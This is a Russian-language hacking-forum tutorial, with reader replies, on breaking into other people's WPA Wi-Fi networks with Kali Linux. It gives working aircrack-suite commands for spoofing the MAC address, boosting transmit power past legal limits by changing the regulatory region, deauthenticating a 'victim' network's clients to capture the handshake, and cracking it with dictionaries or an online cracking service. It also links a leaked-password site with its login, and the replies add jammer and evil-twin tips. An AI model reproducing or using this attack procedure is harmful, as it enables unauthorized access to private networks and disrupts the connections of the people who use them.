Я вас приветствую дорогие повелители своих судеб и просто пользователи форума lolzteam.net! Сегодня вас ждёт замечательная статья о том, как люди получают доступ к вашей Wifi-точке, выводы для защиты, естественно будете делать сами. Для особо ленивых есть сайт с Wifi-точками, и их паролями, проверь! Есть ли там твоя сеть! *Тык*. данные для входа: antichat:antichat. Всё что нам нужно - Kali Linux, Wifi-адаптер, компьютер/ноут (заранее исправный), и, конечно, внимательность с прямыми руками! Для начала определимся с нашими гаджетами. Kali Linux. Советую вам использовать кали на флешке, лично я её ношу с собой постоянно, размера в 32-а гб мне хватает с головой. Если поискать, в любом мухосранске можно найти подобную флешку всего за 275-ть деревянных. Wifi-адаптер. Для постоянной работы, если далее вы хотите заниматься вардрайвингом можно заказать на алике чудо-прибор, собственно, вот ссылка: *Тык*. Установка Kali Linux на флешку. После проведения обязательной переписи приступаем к установке кали на флешку. Нам нужно скачать образ с оф. сайта кали. *Тык*. (Версия для 64-х битный процов.) В придачу нам пригодится программа "Rufus". Скачиваем здесь - *Тык*. У нас есть все ингридиенты для установки, теперь просто запускаем Руфус, вставляем нашу флешку в USB, выбираем образ, нажимаем "Старт", после чего ВЫБИРАЕМ ИМЕННО DD-ОБРАЗ!!!! По проходу некоторого времени программа сделала свою работу и её можно удалить вместе с образом с нашего ПК. Запуск Kali Linux Life с флешки. Уже имея вставленную флешку в заднюю панель ПК запускаем наш компутахтер. Заходим в биос, и выбираем приоритет загрузки для нашей загрузочной флешки. После загрузки компьютера мы имеем окошко с выбором запуска. Естественно, выбираем 1-ю строку, жмакаем "Enter". Для особенно впечатлительных ребят, желающий пользоваться кали на флешке без потери файлов я просто прикреплю эти два видео: *Тык* и *Тык*. Начинаем работу над нашим адаптером! Изначально нужно увеличить мощность адаптера Wifi. Уровень сигнала очень влияет на эффективность нашей с вами атаки на какой либо Wi-FI. Ваш донгл обязан быть чувствительным и слышать слабый сигнал точек доступа и перехватить все хендшейк пакеты. А так же ему нужен хороший передатчик, в другом случае команды деавторизации или ****а WPS-пинов не дойдут до нашего атакуемого. Работая на высокой мощности, адаптер быстро перегревается (особенно в режиме инжекта пакетов), вызывает помехи связи и представляет некоторую опасность для здоровья. Поэтому не ставь сразу 33 dBm. Попробуй начать с 22 и плавно увеличивать значение. Шкала здесь логарифмическая, поэтому прибавка на пару-тройку dBm дает двукратное повышение мощности. По умолчанию все Wi-Fi-модули стартуют на минимальной мощности. В таком режиме они запускаются согласно стандарту ISO 3166, который отражен в базе данных беспроводных устройств. В Linux это wireless regulatory database. В Kali Linux (включая Nethunter) она находится по адресу /lib/crda/regulatory.bin. Этот файл считывает агент центральной базы данных регламентированных настроек (Central Regulatory Domain Agent — CRDA) и отправляет ядру информацию о том, какая мощность допустима для передатчика в данном регионе. Таким образом, в ОС действует общая системная настройка мощности передатчика для любых Wi-Fi-адаптеров на конкретном беспроводном интерфейсе. Иногда для адаптеров задан какой-нибудь код из региона EMEA, где разрешаются только жалкие 100 мВт (20 дБм). Поэтому, подключив любой донгл, ты будешь тщетно слать пакеты "deauth" и пытаться заглушить найденные AP. Мало кто услышит твои 20 дБм, а большая часть наших команд отфильтруется станциями как помехи. Нам нужно сменить MAC-адрес адаптера, это делается так: Открываем терминал (CTRL+ALT+T); macchanger -r wlan0 (-r - рандомный адрес) Теперь задаем название региона, в котором разрешены передатчики мощностью 30 дБм или выше. (оставаясь в терминале): iw reg set BO (по моей памяти Боливия разрешает использовать диапазон большего уровня, нежели в других странах.) iwconfig wlan0 txpower 30 (смена допустимого значения мощности) ifconfig wlan0 up (поднимаем диапазон) Если у вас ничего не вышло - лучше не ковыряться в настройках, ну, или попробуйте заменить wlan0 на wlan1. Включаемся в работу. В терминале следуем командам: airmon-ng check kill (завершает процессы которые могут помешать вашей работе) airmon-ng start wlan0 (запускает работу адаптера) airodump-ng wlan0mon (запускает мониторинг) На этом моменте выбираем нашу цель, копируем её MAC-адрес и вводим: airodump-ng --bssid MAC Wiff-станции(жертвы) --channel 1 -w /root/Desktop/wifi wlan0mon (до команды создайте на рабочем столе файл "wifi", в который и сохранится хендшейк, без этого файла все старания напрасны) После команды выше мы ждём хендшейк, но просто так его можно прождать хоть до Китайской Пасхи, поэтому, мы видим клиентов Wifi-точки, их адрес и, также адрес станции. Исходя из данных следуем по командам открыв ещё один терминал, не закрывая предыдущий и не его завершая работу: aireplay-ng --deauth 20 -a MAC станции -c MAC подключенного клиента wlan0mon Буквально через 30-ть секунд хендшейк уже будет у тебя! - wpaclean ЗдесьДолжноБытьНазваниеФайлаВКоторомХендшейк ЗдесьДолжноБытьНазваниеФайлаВКоторомБудетЧистыйХендшейк (как вы понимаете, комманда будет очищать наш хендшейк от прочего говна, указываем файлы с расположением (к примеру /root/Desktop/wifi (wifi в данном случае уже выступает как файл))). Теперь, мой дорогой друг, мы будем ****ить наш хендшейк. aircrack-ng -w ПутьКСловарю -b MAC станции ЧистыйХэндшейк.cap Для тебя я подарю словарь, с самыми популярными дефолтными паролями! *Тык*. Также можно использовать и сервисы по ****у, к примеру, gpuhash.me (не реклама). *Тык*. Вот и подошла моя статья к концу, я надеюсь что она тебе понравится. Я также провожу аудит безопасности для сайтов, можешь написать мне в ТГ по этому поводу, или в лс на форуме). Прощай, дорогой читатель, надеюсь, ты дальше будешь с удовольствием читать мои авторские статьи).
нахуй так ебать мозги себе с airmon-ng когда можно просто заюзать wifite, а хендшейк через hashcat прогнать (что бы быстрее было)
AIMMISSIE, если есть устройства онлайн которые используют вайфай, сразу после деактивации их сразу подключит назад к точке которая именуется так же, и человек вынужден ввести пароль, но в принципе если не горит, то можно тогда играться с хешем
0x1o1l9g9a4, чел, это маленький процент, сейчас новомодные гаджеты скорее всего, подключаются по маку, а не имении USSDI.
0x1o1l9g9a4, подключение однозначно идёт по MAC сейчас. **** до сих пор актуальный вариант. С упрощением ожидания перехвата хендшейка может помочь WiFi Jammer, потому что Aireplay зачастую надо в 5-6 окнах запускать и может не дать желаемого быстрого результата.